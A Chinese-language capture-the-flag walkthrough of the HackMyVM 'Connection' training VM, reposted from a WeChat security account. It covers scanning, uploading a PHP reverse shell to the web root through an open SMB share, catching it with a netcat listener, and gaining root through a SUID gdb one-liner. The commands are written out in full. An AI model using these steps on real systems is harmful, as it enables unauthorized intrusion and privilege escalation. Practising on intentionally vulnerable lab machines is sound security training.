本次使用靶机来自HackMyVM 它是一个共享易受攻击的VM 和知识的平台,给想要学习和测试他们的黑客技能的人。下载后使用
VritualBox导入即可使用。
难度:简单
信息收集
主机发现
要攻击任何机器,我们需要知道IP地址。接下来我们使用netdiscover进行扫描
# netdiscover -i eth0 -r 192.168.1.0/24
目标地址:192.168.1.112
确认IP地址后,我们需要用到最流行的端口扫描工具nmap来扫描VM枚举机器上的开放端口
# nmap -sV -sC -p- 192.168.1.112
从上面的结果我们发现VM上有三个工作端口,运行的端口有SSH(22),HTTP(80),SMB(139/445)。由于我们没有SSH的凭证,我们先从HTTP服务开始入手。
好吧!从浏览器打开也没有发现什么有用的信息。那就使用路径扫描器dirsearch试一试。
额 只有index.html一个网页。
现在只剩下SMB(139/445)端口,不出意外的话,我们的切入点在这里。
Sambe
我们先尝试一下是否有允许空会话的共享。
# smbclient -L ///192.168.1.112//
呕吼,一共有三份,我们接下来列出“share”文件夹的内容
我们看到在“share”里面有一个名为“html”的文件夹内有index.html。这个表明了是web服务器的根文件夹。所以我们将通过Samba上传一个反向shell并通过web访问它,我们准备一下。
上传反弹shell
# cp /usr/share/webshells/php/php-reverse-shell.php /home/franci4/HackMyVM/Connection修改shell的名字
# mv php-reverse-shell.php sshell.php修改IP地址和端口
# vim sshell.php
配置好脚本后,通过samba服务上传到“html”文件夹。
# put sshell.php
上传成功,我们开启监听并访问上传地址
# nc -nlvp 1234
当执行恶意PHP时,在终端接受到与netcat的连接,获得对系统的访问权限。
我们尝试找一下有没有其他的文件。
很不错我们找到了一个users-flag,还有一个root-flag需要找到
权限提升
访问是通过www-data用户实现的,但是有局限性,我们需要升级到权限更高的用户。
我们先检查一下www-data用户的SUID权限
发现有权限执行gdb二进制文件,我们从GTFObins网站上搜索到一种使用具有SUID权限的gdb二进制文件夹提升权限的方法,只需执行一下命令,就会获得一个权限终端。
# ./gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
这里手残点到了Enter,可以看到命令执行成功。
获得flag
现在我们找找看有没有root-flag。
到这里就结束了,我们已经得到了user-flag&root-flag。
持续更新干货
原文始发于微信公众号(BTS安全团队):HackMyVM-Connection
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论